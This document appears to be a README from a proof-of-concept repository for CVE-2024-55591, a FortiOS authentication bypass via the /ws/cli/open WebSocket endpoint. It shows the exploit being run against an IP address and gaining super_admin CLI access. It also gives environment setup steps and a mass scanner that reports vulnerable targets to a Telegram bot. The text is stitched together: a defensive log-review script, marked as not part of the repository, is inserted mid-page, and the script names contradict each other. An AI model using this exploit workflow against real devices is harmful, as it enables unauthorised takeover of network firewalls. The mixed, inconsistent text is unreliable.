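Related vulnerability
Title:
Fortinet FortiOS and FortiProxy Security Vulnerability
(CVE-2024-55591)
Description: Fortinet FortiOS and Fortinet FortiProxy are both products of Fortinet, a US company. Fortinet FortiOS is a security operating system dedicated to the FortiGate network security platform. It provides users with multiple security functions, including firewall, antivirus, IPSec/SSL VPN, web content filtering and anti-spam. Fortinet FortiProxy is a secure web proxy that protects employees from network attacks by combining multiple detection techniques, such as web filtering, DNS filtering, DLP, antivirus, intrusion prevention and advanced threat protection. FortiProxy helps reduce
Introduction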
# CVE-2024-55591: FortiOS Authentication Bypass
**If you’re reading this, you most likely know what we’re talking about.**

---
# Detection in Action
```
python3 binarywarm-exp.py --host 192.104.119.11 --port 443 --command "show user local" --ssl
██████╗ ██╗███╗ ██╗ █████╗ ██████╗ ██╗ ██╗ ██╗ ██╗ █████╗ ██████╗ ███╗ ███╗
██╔══██╗██║████╗ ██║██╔══██╗██╔══██╗╚██╗ ██╔╝ ██║ ██║██╔══██╗██╔══██╗████╗ ████║
██████╔╝██║██╔██╗ ██║███████║██████╔╝ ╚████╔╝ ██║ █╗ ██║███████║██████╔╝██╔████╔██║
██╔══██╗██║██║╚██╗██║██╔══██║██╔══██╗ ╚██╔╝ ██║███╗██║██╔══██║██╔══██╗██║╚██╔╝██║
██████╔╝██║██║ ╚████║██║ ██║██║ ██║ ██║ ╚███╔███╔╝██║ ██║██║ ██║██║ ╚═╝ ██║
╚═════╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
binarywarm-exp.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by binarywarm
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
```
---
# Description
A critical authentication bypass vulnerability in FortiOS (versions 7.4.0-7.4.2 and 7.2.0-7.2.6) allows unauthorized administrative access through WebSocket protocol manipulation. This repository contains two tools:
1. **Exploit (exp.py)** - Proof-of-Concept for vulnerability exploitation
2. **Scanner (scanner-cve2024-55591.py)** - Mass detection tool with Telegram notifications
---
# Technical Details
**Vulnerability Type**: Session Hijacking via WebSocket Negotiation
**Attack Vector**:
- WebSocket handshake manipulation with forged headers
- Invalid session token acceptance
- Privileged CLI command execution
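A defender-side check for the `/ws/cli/open` endpoint this README lists as an affected component, added here as an example and not part of the repository: it reads HTTP access-log lines and reports CLI WebSocket requests from sources outside the administrator networks, noting whether the handshake was accepted (status 101) and whether the same source fetched `/service-worker.js` first. The log format, the sample lines and the names `review_cli_websocket`, `SAMPLE_LOG` and `admin_nets` are assumptions constructed for illustration.

```python
import ipaddress
import re

# Constructed sample in combined access-log format (assumed: a proxy or sensor logs these).
SAMPLE_LOG = """\
10.0.5.20 - - [14/Jan/2025:09:12:01 +0000] "GET /service-worker.js HTTP/1.1" 200 512
10.0.5.20 - - [14/Jan/2025:09:12:03 +0000] "GET /ws/cli/open HTTP/1.1" 101 0
203.0.113.44 - - [14/Jan/2025:09:30:10 +0000] "GET /service-worker.js HTTP/1.1" 200 512
203.0.113.44 - - [14/Jan/2025:09:30:11 +0000] "GET /ws/cli/open HTTP/1.1" 101 0
198.51.100.7 - - [14/Jan/2025:10:02:45 +0000] "GET /ws/cli/open HTTP/1.1" 403 0
not a log line
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
CLI_WS_PATH = "/ws/cli/open"        # endpoint named in the README
PROBE_PATH = "/service-worker.js"   # component named in the README


def review_cli_websocket(log_text, admin_nets):
    """Return findings for CLI WebSocket requests from outside admin_nets."""
    nets = [ipaddress.ip_network(n) for n in admin_nets]
    probed, findings = set(), []    # probed: sources that fetched the service worker
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                # skip malformed lines instead of failing the run
        try:
            src = ipaddress.ip_address(m["src"])
        except ValueError:
            continue                # source field is not an IP address
        path = m["target"].split("?", 1)[0]
        if path == PROBE_PATH:
            probed.add(src)
        elif path == CLI_WS_PATH and not any(src in n for n in nets):
            findings.append({
                "src": str(src),
                "time": m["ts"],
                "handshake_accepted": m["status"] == "101",  # 101 Switching Protocols
                "probed_first": src in probed,
            })
    return findings


if __name__ == "__main__":
    for finding in review_cli_websocket(SAMPLE_LOG, ["10.0.5.0/24"]):
        print(finding)
```

An accepted handshake from a source outside the administrator networks is the finding to escalate first; a rejected one still shows that the management interface is reachable from that source.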
**Affected Components**:
- `/ws/cli/open` WebSocket endpoint
- Service Worker API (`/service-worker.js`)
# Pentest Environment Setup in `scrypt` Directory
## 1. Initial Server Configuration
### Update system and install core tools
```
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y git python3.10-venv python3-pip python3-dev build-essential libssl-dev libffi-dev ca-certificates
```
## 2. Install base dependencies
```
sudo apt install -y python3 python3-venv python3-pip git
```
## 3. Create project directory and navigate to it
```
mkdir /scrypt && cd /scrypt
```
## 4. Create Python virtual environment named "pentest"
```
python3 -m venv pentest
```
## 5. Activate virtual environment
```
source pentest/bin/activate
```
## 6. Install required Python packages
```
pip install requests urllib3 python-telegram-bot
```
## 7. Move the files exp.py, scanner.py, and targets.txt to the /scrypt directory
---
# Vulnerability searching
## Description
The script cve2032copy2.py scans a list of Fortinet addresses (listed line-by-line in a text file) for the reported vulnerability and sends positive detection results to your Telegram bot.
## Start scanner
```
python3 scanner-cve2024-55591.py --file targets.txt --port 443
```
File snapshot
[4.0K] /data/pocs/9a1ad0a6b334b8791cd95154824afe8505458d35
└── [4.9K] README.md
0 directories, 1 file